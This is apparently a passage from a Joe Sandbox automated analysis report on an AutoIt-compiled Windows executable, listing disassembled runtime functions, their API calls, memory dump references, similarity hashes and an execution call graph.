                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _memmove
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: Error:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4104443479-232661952
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 47c0561e29c226fab9e20f11d30fc4033f42905d42d91430649e8e798f40a5ad
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: e6e9f2aa443a554b8bda50df2a041f2c42dbd20d32390c21629c974d0e28b4a3
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 47c0561e29c226fab9e20f11d30fc4033f42905d42d91430649e8e798f40a5ad
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2101EFB6200115ABC704DF49D981D6AF7A9FF88710708855AF819CB302D774FD20CBA4
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00442651 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22networkCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • InternetCloseHandle.WININET(?), ref: 00442663
                                                                                                                                                                                                                                                                                                                                                                                                                                • InternetCloseHandle.WININET ref: 00442668
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CloseHandleInternet$ObjectSingleWait
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: aeB
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 857135153-906807131
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00431E1F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetTempPathW.KERNEL32(00000104,?), ref: 00431E34
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00431E4C
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Temp$FileNamePath
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: aut
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3285503233-3010740371
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b5938d8baa24fa8bd6c9fd2b7d62684d192cfd552bf23c00763a11c17351aebe
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 5bfe3c05d54daaccf8cad0b894ff223c4051d717a215ac0b7ff4b7edb98d8c84
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b5938d8baa24fa8bd6c9fd2b7d62684d192cfd552bf23c00763a11c17351aebe
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A8D05EB95403086BD324EB90ED4EFA9777CE744700F508AE9BE14461D1AAF06A54CBE9
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004370C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Message_doexit
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1993061046-4017498283
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D

                                                                                                                                                                                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                Execution Coverage:3.6%
                                                                                                                                                                                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0.4%
                                                                                                                                                                                                                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                                                                                                                                                                                                                Total number of Nodes:2000
                                                                                                                                                                                                                                                                                                                                                                                                                                Total number of Limit Nodes:36
                                                                                                                                                                                                                                                                                                                                                                                                                                execution_graph 84238 4010e0 84241 401100 84238->84241 84240 4010f8 84242 401113 84241->84242 84244 401184 84242->84244 84245 40114c 84242->84245 84247 401120 84242->84247 84272 401182 84242->84272 84243 40112c DefWindowProcW 84243->84240 84279 401250 61 API calls __recalloc 84244->84279 84248 401151 84245->84248 84249 40119d 84245->84249 84247->84243 84286 401000 Shell_NotifyIconW __recalloc 84247->84286 84253 401219 84248->84253 84254 40115d 84248->84254 84251 4011a3 84249->84251 84252 42afb4 84249->84252 84250 401193 84250->84240 84251->84247 84261 4011b6 KillTimer 84251->84261 84262 4011db SetTimer RegisterWindowMessageW 84251->84262 84281 40f190 10 API calls 84252->84281 84253->84247 84257 401225 84253->84257 84255 401163 84254->84255 84256 42b01d 84254->84256 84263 42afe9 84255->84263 84264 40116c 84255->84264 84256->84243 84285 4370f4 52 API calls 84256->84285 84297 468b0e 74 API calls __recalloc 84257->84297 84260 42b04f 84287 40e0c0 84260->84287 84280 401000 Shell_NotifyIconW __recalloc 84261->84280 84262->84250 84269 401204 CreatePopupMenu 84262->84269 84283 40f190 10 API calls 84263->84283 84264->84247 84271 401174 84264->84271 84269->84240 84282 45fd57 65 API calls __recalloc 84271->84282 84272->84243 84273 42afe4 84273->84250 84274 42b00e 84284 401a50 331 API calls 84274->84284 84275 4011c9 PostQuitMessage 84275->84240 84278 42afdc 84278->84243 84278->84273 84279->84250 84280->84275 84281->84250 84282->84278 84283->84274 84284->84272 84285->84272 84286->84260 84289 40e0e7 __recalloc 84287->84289 84288 40e142 84296 40e184 84288->84296 84320 4341e6 63 API calls __wcsicoll 84288->84320 84289->84288 84290 42729f DestroyIcon 84289->84290 84290->84288 84292 40e1a0 Shell_NotifyIconW 84298 401b80 84292->84298 84293 4272db Shell_NotifyIconW 84295 40e1ba 84295->84272 84296->84292 84296->84293 84297->84273 84299 401b9c 84298->84299 84319 401c7e 84298->84319 84321 4013c0 84299->84321 84302 42722b LoadStringW 84305 427246 84302->84305 84303 401bb9 84326 402160 84303->84326 84340 40e0a0 84305->84340 84306 401bcd 84308 427258 84306->84308 84309 401bda 84306->84309 84344 40d200 52 API calls 2 library calls 84308->84344 84309->84305 84310 401be4 84309->84310 84339 40d200 52 API calls 2 library calls 84310->84339 84313 427267 84314 42727b 84313->84314 84315 401bf3 _wcscpy __recalloc _wcsncpy 84313->84315 84345 40d200 52 API calls 2 library calls 84314->84345 84318 401c62 Shell_NotifyIconW 84315->84318 84317 427289 84318->84319 84319->84295 84320->84296 84346 4115d7 84321->84346 84327 426daa 84326->84327 84329 40216b _wcslen 84326->84329 84384 40c600 84327->84384 84331 402180 84329->84331 84332 40219e 84329->84332 84330 426db5 84330->84306 84383 403bd0 52 API calls ctype 84331->84383 84334 4013a0 52 API calls 84332->84334 84336 4021a5 84334->84336 84335 402187 _memmove 84335->84306 84337 426db7 84336->84337 84338 4115d7 52 API calls 84336->84338 84338->84335 84339->84315 84341 40e0b2 84340->84341 84342 40e0a8 84340->84342 84341->84315 84396 403c30 52 API calls _memmove 84342->84396 84344->84313 84345->84317 84348 4115e1 _malloc 84346->84348 84349 4013e4 84348->84349 84351 4115fd std::exception::exception 84348->84351 84360 4135bb 84348->84360 84357 4013a0 84349->84357 84350 41163b 84375 4180af 46 API calls std::exception::operator= 84350->84375 84351->84350 84374 41130a 51 API calls __cinit 84351->84374 84353 411645 84376 418105 RaiseException 84353->84376 84356 411656 84358 4115d7 52 API calls 84357->84358 84359 4013a7 84358->84359 84359->84302 84359->84303 84361 413638 _malloc 84360->84361 84366 4135c9 _malloc 84360->84366 84382 417f77 46 API calls __getptd_noexit 84361->84382 84364 4135f7 RtlAllocateHeap 84364->84366 84373 413630 84364->84373 84366->84364 84367 4135d4 84366->84367 84368 413624 84366->84368 84371 413622 84366->84371 84367->84366 84377 418901 46 API calls __NMSG_WRITE 84367->84377 84378 418752 46 API calls 6 library calls 84367->84378 84379 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 84367->84379 84380 417f77 46 API calls __getptd_noexit 84368->84380 84381 417f77 46 API calls __getptd_noexit 84371->84381 84373->84348 84374->84350 84375->84353 84376->84356 84377->84367 84378->84367 84380->84371 84381->84373 84382->84373 84383->84335 84385 40c619 84384->84385 84386 40c60a 84384->84386 84385->84330 84386->84385 84389 4026f0 84386->84389 84388 426d7a _memmove 84388->84330 84390 426873 84389->84390 84391 4026ff 84389->84391 84392 4013a0 52 API calls 84390->84392 84391->84388 84393 42687b 84392->84393 84394 4115d7 52 API calls 84393->84394 84395 42689e _memmove 84394->84395 84395->84388 84396->84341 84397 40bd20 84398 428194 84397->84398 84399 40bd2d 84397->84399 84400 40bd43 84398->84400 84402 4281bc 84398->84402 84404 4281b2 84398->84404 84401 40bd37 84399->84401 84420 4531b1 85 API calls 5 library calls 84399->84420 84409 40bd50 84401->84409 84419 45e987 86 API calls ctype 84402->84419 84418 40b510 VariantClear 84404->84418 84408 4281ba 84410 426cf1 84409->84410 84411 40bd63 84409->84411 84430 44cde9 52 API calls _memmove 84410->84430 84421 40bd80 84411->84421 84414 40bd73 84414->84400 84415 426cfc 84416 40e0a0 52 API calls 84415->84416 84417 426d02 84416->84417 84418->84408 84419->84399 84420->84401 84422 40bd8e 84421->84422 84423 40bdb7 _memmove 84421->84423 84422->84423 84424 40bded 84422->84424 84425 40bdad 84422->84425 84423->84414 84427 4115d7 52 API calls 84424->84427 84431 402f00 84425->84431 84428 40bdf6 84427->84428 84428->84423 84429 4115d7 52 API calls 84428->84429 84429->84423 84430->84415 84432 402f10 84431->84432 84433 402f0c 84431->84433 84434 4115d7 52 API calls 84432->84434 84435 4268c3 84432->84435 84433->84423 84436 402f51 ctype _memmove 84434->84436 84436->84423 84437 425ba2 84442 40e360 84437->84442 84439 425bb4 84458 41130a 51 API calls __cinit 84439->84458 84441 425bbe 84443 4115d7 52 API calls 84442->84443 84444 40e3ec GetModuleFileNameW 84443->84444 84459 413a0e 84444->84459 84446 40e421 _wcsncat 84462 413a9e 84446->84462 84449 4115d7 52 API calls 84450 40e45e _wcscpy 84449->84450 84465 40bc70 84450->84465 84454 40e4a9 84454->84439 84455 401c90 52 API calls 84457 40e4a1 _wcscat _wcslen _wcsncpy 84455->84457 84456 4115d7 52 API calls 84456->84457 84457->84454 84457->84455 84457->84456 84458->84441 84484 413801 84459->84484 84514 419efd 84462->84514 84466 4115d7 52 API calls 84465->84466 84467 40bc98 84466->84467 84468 4115d7 52 API calls 84467->84468 84469 40bca6 84468->84469 84470 40e4c0 84469->84470 84526 403350 84470->84526 84472 40e4cb RegOpenKeyExW 84473 427190 RegQueryValueExW 84472->84473 84474 40e4eb 84472->84474 84475 4271b0 84473->84475 84476 42721a RegCloseKey 84473->84476 84474->84457 84477 4115d7 52 API calls 84475->84477 84476->84457 84478 4271cb 84477->84478 84533 43652f 52 API calls 84478->84533 84480 4271d8 RegQueryValueExW 84481 4271f7 84480->84481 84483 42720e 84480->84483 84482 402160 52 API calls 84481->84482 84482->84483 84483->84476 84485 41389e 84484->84485 84491 41381a 84484->84491 84486 4139e8 84485->84486 84487 413a00 84485->84487 84511 417f77 46 API calls __getptd_noexit 84486->84511 84513 417f77 46 API calls __getptd_noexit 84487->84513 84490 4139ed 84512 417f25 10 API calls __write_nolock 84490->84512 84491->84485 84497 41388a 84491->84497 84506 419e30 46 API calls __write_nolock 84491->84506 84494 41396c 84494->84485 84495 413967 84494->84495 84498 41397a 84494->84498 84495->84446 84496 413929 84496->84485 84499 413945 84496->84499 84508 419e30 46 API calls __write_nolock 84496->84508 84497->84485 84505 413909 84497->84505 84507 419e30 46 API calls __write_nolock 84497->84507 84510 419e30 46 API calls __write_nolock 84498->84510 84499->84485 84499->84495 84501 41395b 84499->84501 84509 419e30 46 API calls __write_nolock 84501->84509 84505->84494 84505->84496 84506->84497 84507->84505 84508->84499 84509->84495 84510->84495 84511->84490 84512->84495 84513->84495 84515 419f13 84514->84515 84516 419f0e 84514->84516 84523 417f77 46 API calls __getptd_noexit 84515->84523 84516->84515 84521 419f2b 84516->84521 84518 419f18 84524 417f25 10 API calls __write_nolock 84518->84524 84522 40e454 84521->84522 84525 417f77 46 API calls __getptd_noexit 84521->84525 84522->84449 84523->84518 84524->84522 84525->84518 84527 403367 84526->84527 84528 403358 84526->84528 84529 4115d7 52 API calls 84527->84529 84528->84472 84530 403370 84529->84530 84531 4115d7 52 API calls 84530->84531 84532 40339e 84531->84532 84532->84472 84533->84480 84534 416454 84571 416c70 84534->84571 84536 416460 GetStartupInfoW 84537 416474 84536->84537 84572 419d5a HeapCreate 84537->84572 84539 4164cd 84540 4164d8 84539->84540 84656 41642b 46 API calls 3 library calls 84539->84656 84573 417c20 GetModuleHandleW 84540->84573 84543 4164de 84544 4164e9 __RTC_Initialize 84543->84544 84657 41642b 46 API calls 3 library calls 84543->84657 84592 41aaa1 GetStartupInfoW 84544->84592 84548 416503 GetCommandLineW 84605 41f584 GetEnvironmentStringsW 84548->84605 84551 416513 84611 41f4d6 GetModuleFileNameW 84551->84611 84554 41651d 84555 416528 84554->84555 84659 411924 46 API calls 3 library calls 84554->84659 84615 41f2a4 84555->84615 84558 41652e 84559 416539 84558->84559 84660 411924 46 API calls 3 library calls 84558->84660 84629 411703 84559->84629 84562 416541 84564 41654c __wwincmdln 84562->84564 84661 411924 46 API calls 3 library calls 84562->84661 84633 40d6b0 84564->84633 84567 41657c 84663 411906 46 API calls _doexit 84567->84663 84570 416581 _fprintf 84571->84536 84572->84539 84574 417c34 84573->84574 84575 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 84573->84575 84664 4178ff 49 API calls _free 84574->84664 84577 417c87 TlsAlloc 84575->84577 84580 417cd5 TlsSetValue 84577->84580 84581 417d96 84577->84581 84578 417c39 84578->84543 84580->84581 84582 417ce6 __init_pointers 84580->84582 84581->84543 84665 418151 InitializeCriticalSectionAndSpinCount 84582->84665 84584 417d91 84673 4178ff 49 API calls _free 84584->84673 84586 417d2a 84586->84584 84666 416b49 84586->84666 84589 417d76 84672 41793c 46 API calls 4 library calls 84589->84672 84591 417d7e GetCurrentThreadId 84591->84581 84593 416b49 __calloc_crt 46 API calls 84592->84593 84603 41aabf 84593->84603 84594 4164f7 84594->84548 84658 411924 46 API calls 3 library calls 84594->84658 84595 41ac6a GetStdHandle 84600 41ac34 84595->84600 84596 416b49 __calloc_crt 46 API calls 84596->84603 84597 41acce SetHandleCount 84597->84594 84598 41ac7c GetFileType 84598->84600 84599 41abb4 84599->84600 84601 41abe0 GetFileType 84599->84601 84602 41abeb InitializeCriticalSectionAndSpinCount 84599->84602 84600->84595 84600->84597 84600->84598 84604 41aca2 InitializeCriticalSectionAndSpinCount 84600->84604 84601->84599 84601->84602 84602->84594 84602->84599 84603->84594 84603->84596 84603->84599 84603->84600 84604->84594 84604->84600 84606 41f595 84605->84606 84607 41f599 84605->84607 84606->84551 84683 416b04 84607->84683 84609 41f5c2 FreeEnvironmentStringsW 84609->84551 84610 41f5bb _memmove 84610->84609 84612 41f50b _wparse_cmdline 84611->84612 84613 416b04 __malloc_crt 46 API calls 84612->84613 84614 41f54e _wparse_cmdline 84612->84614 84613->84614 84614->84554 84616 41f2bc _wcslen 84615->84616 84618 41f2b4 84615->84618 84617 416b49 __calloc_crt 46 API calls 84616->84617 84621 41f2e0 _wcslen 84617->84621 84618->84558 84619 41f336 84690 413748 84619->84690 84621->84618 84621->84619 84622 416b49 __calloc_crt 46 API calls 84621->84622 84623 41f35c 84621->84623 84626 41f373 84621->84626 84689 41ef12 46 API calls __write_nolock 84621->84689 84622->84621 84624 413748 _free 46 API calls 84623->84624 84624->84618 84696 417ed3 84626->84696 84628 41f37f 84628->84558 84630 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 84629->84630 84632 411750 __IsNonwritableInCurrentImage 84630->84632 84715 41130a 51 API calls __cinit 84630->84715 84632->84562 84634 42e2f3 84633->84634 84635 40d6cc 84633->84635 84716 408f40 84635->84716 84637 40d707 84720 40ebb0 84637->84720 84640 40d737 84723 411951 84640->84723 84645 40d751 84735 40f4e0 SystemParametersInfoW SystemParametersInfoW 84645->84735 84647 40d75f 84736 40d590 GetCurrentDirectoryW 84647->84736 84649 40d767 SystemParametersInfoW 84650 40d794 84649->84650 84651 40d78d FreeLibrary 84649->84651 84652 408f40 VariantClear 84650->84652 84651->84650 84653 40d79d 84652->84653 84654 408f40 VariantClear 84653->84654 84655 40d7a6 84654->84655 84655->84567 84662 4118da 46 API calls _doexit 84655->84662 84656->84540 84657->84544 84662->84567 84663->84570 84664->84578 84665->84586 84668 416b52 84666->84668 84669 416b8f 84668->84669 84670 416b70 Sleep 84668->84670 84674 41f677 84668->84674 84669->84584 84669->84589 84671 416b85 84670->84671 84671->84668 84671->84669 84672->84591 84673->84581 84675 41f683 84674->84675 84680 41f69e _malloc 84674->84680 84676 41f68f 84675->84676 84675->84680 84682 417f77 46 API calls __getptd_noexit 84676->84682 84677 41f6b1 HeapAlloc 84679 41f6d8 84677->84679 84677->84680 84679->84668 84680->84677 84680->84679 84681 41f694 84681->84668 84682->84681 84686 416b0d 84683->84686 84684 4135bb _malloc 45 API calls 84684->84686 84685 416b43 84685->84610 84686->84684 84686->84685 84687 416b24 Sleep 84686->84687 84688 416b39 84687->84688 84688->84685 84688->84686 84689->84621 84691 41377c __dosmaperr 84690->84691 84692 413753 RtlFreeHeap 84690->84692 84691->84618 84692->84691 84693 413768 84692->84693 84699 417f77 46 API calls __getptd_noexit 84693->84699 84695 41376e GetLastError 84695->84691 84700 417daa 84696->84700 84699->84695 84701 417dc9 __recalloc __call_reportfault 84700->84701 84702 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 84701->84702 84703 417eb5 __call_reportfault 84702->84703 84706 41a208 84703->84706 84705 417ed1 GetCurrentProcess TerminateProcess 84705->84628 84707 41a210 84706->84707 84708 41a212 IsDebuggerPresent 84706->84708 84707->84705 84714 41fe19 84708->84714 84711 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 84712 421ff0 __call_reportfault 84711->84712 84713 421ff8 GetCurrentProcess TerminateProcess 84711->84713 84712->84713 84713->84705 84714->84711 84715->84632 84718 408f48 ctype 84716->84718 84717 4265c7 VariantClear 84719 408f55 ctype 84717->84719 84718->84717 84718->84719 84719->84637 84776 40ebd0 84720->84776 84780 4182cb 84723->84780 84725 41195e 84787 4181f2 LeaveCriticalSection 84725->84787 84727 40d748 84728 4119b0 84727->84728 84729 4119d6 84728->84729 84730 4119bc 84728->84730 84729->84645 84730->84729 84822 417f77 46 API calls __getptd_noexit 84730->84822 84732 4119c6 84823 417f25 10 API calls __write_nolock 84732->84823 84734 4119d1 84734->84645 84735->84647 84824 401f20 84736->84824 84738 40d5b6 IsDebuggerPresent 84739 40d5c4 84738->84739 84740 42e1bb MessageBoxA 84738->84740 84741 42e1d4 84739->84741 84742 40d5e3 84739->84742 84740->84741 84996 403a50 52 API calls 3 library calls 84741->84996 84894 40f520 84742->84894 84746 40d5fd GetFullPathNameW 84906 401460 84746->84906 84748 40d63b 84749 40d643 84748->84749 84750 42e231 SetCurrentDirectoryW 84748->84750 84751 40d64c 84749->84751 84997 432fee 6 API calls 84749->84997 84750->84749 84921 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 84751->84921 84754 42e252 84754->84751 84756 42e25a GetModuleFileNameW 84754->84756 84758 42e274 84756->84758 84759 42e2cb GetForegroundWindow ShellExecuteW 84756->84759 84998 401b10 84758->84998 84761 40d688 84759->84761 84760 40d656 84763 40d669 84760->84763 84765 40e0c0 74 API calls 84760->84765 84767 40d692 SetCurrentDirectoryW 84761->84767 84929 4091e0 84763->84929 84765->84763 84767->84649 84770 42e28d 85005 40d200 52 API calls 2 library calls 84770->85005 84773 42e299 GetForegroundWindow ShellExecuteW 84774 42e2c6 84773->84774 84774->84761 84775 40ec00 LoadLibraryA GetProcAddress 84775->84640 84777 40d72e 84776->84777 84778 40ebd6 LoadLibraryA 84776->84778 84777->84640 84777->84775 84778->84777 84779 40ebe7 GetProcAddress 84778->84779 84779->84777 84781 4182e0 84780->84781 84782 4182f3 EnterCriticalSection 84780->84782 84788 418209 84781->84788 84782->84725 84784 4182e6 84784->84782 84815 411924 46 API calls 3 library calls 84784->84815 84787->84727 84789 418215 _fprintf 84788->84789 84790 418225 84789->84790 84791 41823d 84789->84791 84816 418901 46 API calls __NMSG_WRITE 84790->84816 84794 416b04 __malloc_crt 45 API calls 84791->84794 84797 41824b _fprintf 84791->84797 84793 41822a 84817 418752 46 API calls 6 library calls 84793->84817 84796 418256 84794->84796 84799 41825d 84796->84799 84800 41826c 84796->84800 84797->84784 84798 418231 84818 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 84798->84818 84819 417f77 46 API calls __getptd_noexit 84799->84819 84801 4182cb __lock 45 API calls 84800->84801 84804 418273 84801->84804 84806 4182a6 84804->84806 84807 41827b InitializeCriticalSectionAndSpinCount 84804->84807 84810 413748 _free 45 API calls 84806->84810 84808 418297 84807->84808 84809 41828b 84807->84809 84821 4182c2 LeaveCriticalSection _doexit 84808->84821 84811 413748 _free 45 API calls 84809->84811 84810->84808 84812 418291 84811->84812 84820 417f77 46 API calls __getptd_noexit 84812->84820 84816->84793 84817->84798 84819->84797 84820->84808 84821->84797 84822->84732 84823->84734 85006 40e6e0 84824->85006 84828 401f41 GetModuleFileNameW 85024 410100 84828->85024 84830 401f5c 85036 410960 84830->85036 84833 401b10 52 API calls 84834 401f81 84833->84834 85039 401980 84834->85039 84836 401f8e 84837 408f40 VariantClear 84836->84837 84838 401f9d 84837->84838 84839 401b10 52 API calls 84838->84839 84840 401fb4 84839->84840 84841 401980 53 API calls 84840->84841 84842 401fc3 84841->84842 84843 401b10 52 API calls 84842->84843 84844 401fd2 84843->84844 85047 40c2c0 84844->85047 84846 401fe1 84847 40bc70 52 API calls 84846->84847 84848 401ff3 84847->84848 85065 401a10 84848->85065 84850 401ffe 85072 4114ab 84850->85072 84853 428b05 84855 401a10 52 API calls 84853->84855 84854 402017 84856 4114ab __wcsicoll 58 API calls 84854->84856 84857 428b18 84855->84857 84858 402022 84856->84858 84860 401a10 52 API calls 